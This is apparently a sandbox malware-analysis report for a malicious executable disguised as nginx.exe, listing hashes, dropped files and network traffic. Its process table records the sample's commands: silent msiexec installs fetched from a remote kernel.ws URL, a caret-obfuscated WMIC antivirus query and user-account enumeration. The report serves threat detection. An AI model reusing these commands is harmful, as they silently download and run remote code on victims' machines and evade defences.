| File name: | nginx.exe |
| Full analysis: | https://app.any.run/tasks/00707a16-99c6-48a8-88f7-23ef657fcede |
| Verdict: | Malicious activity |
| Analysis date: | October 30, 2024, 21:05:42 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections |
| MD5: | 08F2F71F5A3C09B2812B62964D900702 |
| SHA1: | 279594624B7A27D1FBB5DA1132881B1C6D4C0C67 |
| SHA256: | EF3010ED240E698695F2DB9AADB3AF2B9BD511A7DEB62366756150FA0D77CF54 |
| SSDEEP: | 6144:sotn5fXvsNaPmjEInLuKhI5nbUhe2eX42r:sotnxvsNaPmjE8hUu104 |
| .exe | | | Win64 Executable (generic) (64.6) |
|---|---|---|
| .dll | | | Win32 Dynamic Link Library (generic) (15.4) |
| .exe | | | Win32 Executable (generic) (10.5) |
| .exe | | | Generic Win/DOS Executable (4.6) |
| .exe | | | DOS Executable Generic (4.6) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2018:12:12 14:49:56+00:00 |
| ImageFileCharacteristics: | Executable, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 10 |
| CodeSize: | 263680 |
| InitializedDataSize: | 101376 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x37a7e |
| OSVersion: | 5.1 |
| ImageVersion: | - |
| SubsystemVersion: | 5.1 |
| Subsystem: | Windows GUI |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1180 | msiexec /quiet /i HtTp://00000000rwz30.kernel.ws/1st/1wwMHUaCl0J3RGSUsx05Q6/rdaOl2w0YnrfhoqBJDOXvUmwQsmIaRnkhiPD2ntXh | C:\Windows\SysWOW64\msiexec.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1619 Version: 5.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1180 | msiexec /quiet /i HtTp://00000000rwz30.kernel.ws/1st/yNvic6iqdHGsEIzkGL1hirPfRq54FQ/vT7QsJRGd0gh83P/dtsoen2SRoGnpkEP2 | C:\Windows\SysWOW64\msiexec.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1619 Version: 5.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1196 | msiexec /quiet /i HtTp://00000000rwz30.kernel.ws/1st/rpua7bjNltZu4xdqKuiMsjCBHkPtkwT8MK80ds9N+9zUTfMMDMMzdM+2oT1QlWCB | C:\Windows\SysWOW64\msiexec.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1619 Version: 5.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1280 | cmd /c "W^M^I^C /Node:l^o^ca^l^h^o^s^t^ ^/Namespace:\\root\SecurityCenter2 Path A^n^t^i^V^i^ru^s^Pr^o^d^u^c^t^ ^Get displayName /Format:List >> ~d" | C:\Windows\SysWOW64\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1768 | msiexec /quiet /i HtTp://00000000rwz30.kernel.ws/1st/WJQD+Rda5+Y1kptjKPhL6b0KtP1Bb7irwKcWtWWHOWTR5IlAxOdzfK+X32lC5BtF | C:\Windows\SysWOW64\msiexec.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1619 Version: 5.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2088 | msiexec /quiet /i HtTp://00000000rwz30.kernel.ws/1st/YxxaYpI95zzV/pwlyZ9J/BDGc4oxgM6SU+Sq7eHPrRlMruFp6yET6gf+vN1pE+VG | C:\Windows\SysWOW64\msiexec.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1619 Version: 5.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2360 | WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | C:\Windows\SysWOW64\wbem\WMIC.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2444 | msiexec /quiet /i HtTp://00000000rwz30.kernel.ws/1st/rhPker5mxj7TWzoMLlSl/RLSJHxMyC7QPGs0rRJ0R0VebKwMwjcI6C+plX3WlA7f | C:\Windows\SysWOW64\msiexec.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1619 Version: 5.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2780 | C:\WINDOWS\system32\net1 user | C:\Windows\SysWOW64\net1.exe | — | net.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2784 | msiexec /quiet /i HtTp://00000000rwz30.kernel.ws/1st/NHTLRhqOYM0Kq9uWZRzBWius1Wwdw9oV1jB02z2CbaywDce1j2CdlW2W3jCPYJtr | C:\Windows\SysWOW64\msiexec.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1619 Version: 5.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (6124) TiWorker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing |
| Operation: | write | Name: | SessionIdHigh |
Value: 31140623 | |||
| (PID) Process: | (6124) TiWorker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing |
| Operation: | write | Name: | SessionIdLow |
Value: | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6124 | TiWorker.exe | C:\Windows\Logs\CBS\CBS.log | text | |
MD5:5973C11084A7F2CE4B85ED88C3AF158B | SHA256:22580959DA9D79F18DB4AE61450702679988336F373137DDAA39C5C5A1D6FFC4 | |||
| 6416 | makecab.exe | C:\Users\admin\AppData\Local\Temp\cab_6416_2 | binary | |
MD5:C162AFB582A531C60272C59663CAC624 | SHA256:C27CCA6ADA0E1F8A2E3A59A8C030FA07F101FFC9BA25B09CB58723E8FCB5D92C | |||
| 6416 | makecab.exe | C:\Users\admin\AppData\Local\Temp\~d.c | compressed | |
MD5:5AB58C16D62AE1CE418DC4B478F4F798 | SHA256:7B540DF81869173B95A1203589CB173A17BDB84A1F53E9C455E2BDA69F0E77F4 | |||
| 6416 | makecab.exe | C:\Users\admin\AppData\Local\Temp\cab_6416_5 | binary | |
MD5:744B8BF9147E85B8E578162E19901D0B | SHA256:B698BD7B44836C1EAE024C789D32BF3C06B47A8693FA0E8D3385159A58404233 | |||
| 6416 | makecab.exe | C:\Users\admin\AppData\Local\Temp\cab_6416_4 | binary | |
MD5:4496465ACA21A7A8581BD03DF28E47EF | SHA256:22685B847A1CC68BD63897298CD336B2464F8C6A714A09F5EEA9C6B044A0D99F | |||
| 4508 | nginx.exe | C:\Users\admin\AppData\Local\Temp\cp.cmd | text | |
MD5:C4C65183E33A0CCA03C0BD2F5A63DC8F | SHA256:079DB5B88BBA15376B4406414371962396C08A70983F347613D88A588C62679E | |||
| 4692 | cmd.exe | C:\Users\admin\AppData\Local\Temp\jj\cpp.cmd | text | |
MD5:9905E5A33C6EDD8EB5F59780AFBF74DE | SHA256:C134B2F85415BA5CFCE3E3FE4745688335745A9BB22152AC8F5C77F190D8AEE3 | |||
| 6416 | makecab.exe | C:\Users\admin\AppData\Local\Temp\cab_6416_3 | binary | |
MD5:744B8BF9147E85B8E578162E19901D0B | SHA256:B698BD7B44836C1EAE024C789D32BF3C06B47A8693FA0E8D3385159A58404233 | |||
| 6864 | certutil.exe | C:\Users\admin\AppData\Local\Temp\~d.o | text | |
MD5:47AAA4FB60C1A0606E192EB6B6881A97 | SHA256:D394CAE2A9B4CB4B359AADB84B49A988DFFD717B23370A9E1243E72F45BA24A1 | |||
| 4692 | cmd.exe | C:\Users\admin\AppData\Local\Temp\~d | text | |
MD5:1E7BEFA642381B30DA89351ED1ADBA46 | SHA256:9E783D0B1759F9928B0D310A919BBB2E18BD713467911574D421E481E75DE27B | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5488 | MoUsoCoreWorker.exe | GET | 200 | 2.16.164.49:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5488 | MoUsoCoreWorker.exe | GET | 200 | 23.32.185.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
3524 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
6376 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
3524 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
7052 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5488 | MoUsoCoreWorker.exe | 2.16.164.49:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted |
5488 | MoUsoCoreWorker.exe | 23.32.185.131:80 | www.microsoft.com | AKAMAI-AS | BR | whitelisted |
4360 | SearchApp.exe | 2.23.209.189:443 | www.bing.com | Akamai International B.V. | GB | whitelisted |
— | — | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
4020 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
6376 | svchost.exe | 40.126.32.134:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6376 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
google.com |
| whitelisted |
login.live.com |
| whitelisted |
th.bing.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |